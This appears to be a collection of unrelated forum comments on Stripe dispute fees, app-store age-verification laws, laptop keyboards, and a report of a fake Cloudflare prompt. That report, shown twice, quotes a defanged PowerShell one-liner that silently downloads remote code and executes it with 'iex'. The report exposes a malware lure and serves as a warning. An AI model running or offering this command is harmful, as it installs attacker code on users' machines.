Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).
When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?
Win+R (run prompt), Ctrl+V (paste), Enter (execute).
What are we executing? This (I replaced . with [DOT]):
powershell -w h "curl bronxy[DOT]cc/sign/in|iex"
Threat actors often use the "iex" command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.
In addition to the existing $15 fee every time someone files a dispute, @stripe will now start charging an additional $15 fee for countering the dispute, which you only get back if you win.
Banks constantly claw back legitimate transactions no matter what evidence you show them, so now they'll take $30 instead of $15¹.
This is highway robbery.
¹ - unless you use Stripe's Smart Disputes AI, which isn't out yet
We need this in the US. Otherwise, once laws like this https://apnews.com/article/utah-app-store-age-verification-7... go into effect, 3rd party app stores, like apkmirror.com, etc. are going to need to pull out of the US unless there's a service like that in the country. It's starting with Utah, but many states and even the feds are planning similar laws.
What knock on effects do you see here, for state-led legislation about online privacy? Do we see privacy-conscious vs restrictive US states, and do folks in the (let’s say it, blue) states host US-centric Mullvads? Like out of state abortions.
Going further, how might this effect folks having “freedom is more important than safety” beliefs, given they reside in areas more likely to deny civil liberties-ish rights in the name of family values-ish rights, when this starts to really hit them where it hurts? Everything they do or say online becomes traceable to them, for a notoriously vocal-on-social media set.
The new laws, such as the one that just passed in Utah, require kids to get the consent of their parents to install apps. So now add that complexity to the flow.
Every time I consider one of your laptops, I see that there are no options for dedicated page up, page down, home, and end keys and those are deal breakers for me. I always end up with a Lenovo instead.
Would you consider adding keyboard options that include these keys?
FWIW I have a Framework 16, and the keyboards run QMK, so are reprogrammable. I have those keys at the top row of my macropad. They don't have labels and are in kind of a weird place, but probably not less weird than an average laptop.
When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?
Win+R (run prompt), Ctrl+V (paste), Enter (execute).
What are we executing? This (I replaced . with [DOT]): powershell -w h "curl bronxy[DOT]cc/sign/in|iex"
Threat actors often use the "iex" command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.